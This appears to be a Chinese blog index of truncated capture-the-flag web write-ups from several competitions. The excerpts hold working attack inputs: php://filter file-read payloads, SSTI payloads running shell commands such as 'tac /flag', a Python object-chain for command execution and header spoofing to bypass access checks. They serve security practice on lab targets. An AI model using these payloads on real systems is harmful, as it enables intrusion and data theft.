BUUCTF靶场
前言新开个靶场接着刷题,极客大挑战已经做过的就跳了,参考极客大挑战-WP | Yxing [ACTF2020 新生赛]Include根据tips中的文件包含直接伪协议 GET:file=php://filter/read=convert.base64-encode/resource=flag.php flag{99cbe927-0326-4ad0-9cbb-0d524fef23e3} [HCTF 2018]WarmUp源码提示source.php,直接访问,源码发现hint.php,也直接访问 //source.php<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist =...
CMCTF-WP
WEBpop<?phpclass A1{ public $a1;}class A2{ public $a2 = '10086';}class A3{ public $a3;}class A4{ public $a4;}$a=new A1();$a->a1=new A2();$a->a1->a2=new A3();$a->a1->a2->a3=new A4();echo...
HNCTF-WP
WEBDeceptiFlag看到隐藏元素,而且提示拼音,分别输xiyangyang,huitailang进入tips.php cookie中发现flag位置为/var/flag/flag.txt,随便尝试几个路径包含发现都不行,伪协议读取成功 //file=php://filter/read=convert.base64-encode/resource=tips.php//tips.php<?phpsession_start();// 为 PHP 7 添加 str_starts_with 函数兼容支持if (!function_exists('str_starts_with')) { function str_starts_with($haystack, $needle) { return strpos($haystack, $needle) === 0; }}if (!isset($_SESSION['verified']) ||...
LitCTF-WP
猫猫黑客小分队-yxing,mintlovectf,zhaowumian-42名 WEB星愿信箱尝试后发现是SSTI,但是过滤了{{}},用{%print%}绕过就行 {%print lipsum.__globals__.get('os').popen('tac /flag').read()%} NSSCTF{4a1bc0ff-4184-4832-8294-10b7838b30f2} nest_js参考漏洞预警 | Next.js 中间件鉴权绕过漏洞 (CVE-2025-29927) |...
米好信安挑战赛&黄河流域挑战赛-WP
米好信安挑战赛WEB1 尝试发现过滤__base__、单引号。旁路注入就行 GET:a=popen&b=tac+/flagPOST:content={{().__class__.__mro__[1].__subclasses__()[132].__init__.__globals__[request.args.a](request.args.b).read()}} flag{45f262f8515a42a85400321eccae7f0b} CRYPTO2先爆破密码得到密码为123456 我们截获到了一段密文:zhq rop sb lpgh mcqm cit tab。 已知以下条件: 使用的型号为 M3。 接线板设置为:ab cd ef gh ij kl mn op qr st。 反射器使用的是 UKW-B。 反射器的位置设置为 3,环设置为 5。 三个转子的设置分别为: ○ 第一个转子:rotor1 为 II,位置(position1)为 4,环(ring1)为 6。 ○ 第二个转子:rotor2 为...
轩辕杯-WP
WEBezjs import requestsurl="http://27.25.151.26:53243/getflag.php"payload="score=100000000000"headers={'Content-Type':...
帕鲁杯-WP
WEBCatBank逻辑漏洞,允许余额为负值,那么多注册几个账号后相互转账,到一百万时获得flag palu{0a2c13c6a72e4429a5ef89057f01ee16} CatNet扫目录发现/admin路由,提示本地访问,添加X-Forwarded-For:127.0.0.1,响应包中看到需要带上X-Internal-Auth:cateye-internal-000去访问/flag,但是错误,爆破数字在123时获得flag palu{e60ed7efcfe648b09439e4334b319e6e} ezblog(复现)反编译dashboard.class获得如下源码,但是不知道怎么找realkey package com.example.demo.Controller;import org.noear.solon.annotation.Controller;import org.noear.solon.annotation.Mapping;import...
CTBUCTF-WP
WEBWelcome !! ctbuctf{we1c0me_t0_CT9UC7F2025} Sql_No_map…?原先还在自己测,结果发现目录有东西…… //index.php<?phprequire 'lib.php';header("Content-Type: text/html; charset=utf-8");$err = '';$selected_id = $_GET['id'] ?? '';$selected_article = null;// 获取文章列表$list_sql = "SELECT id, title FROM article ORDER BY id ASC"; //升序排列$list_res = db()->query($list_sql);$articles = [];while ($row = $list_res->fetch_assoc()) { $articles[]...
御网杯-WP
WEBYWB_Web_xff源码泄露 <?phpif ($_SERVER["REQUEST_METHOD"] == "POST") { $cip = $_SERVER["HTTP_X_FORWARDED_FOR"]; if ($cip == "2.2.2.1") { echo '<div class="success">'; echo '<h2>登录成功!</h2>'; $flag = file_get_contents('/flag.txt'); echo '<p>flag{' . htmlspecialchars($flag) . '}</p>'; echo...
ISCC-WP
2025区域赛WEB哪吒的试炼提示食物,莲藕,传参为food=lotus root。发现不可用按钮,去掉disable获得源码 <?phpif (isset($_POST['nezha'])) { $nezha = json_decode($_POST['nezha']); $seal_incantation = $nezha->incantation; $md5 = $nezha->md5; $secret_power = $nezha->power; $true_incantation = "I_am_the_spirit_of_fire"; $final_incantation = preg_replace( "/" . preg_quote($true_incantation, '/') . "/", '', ...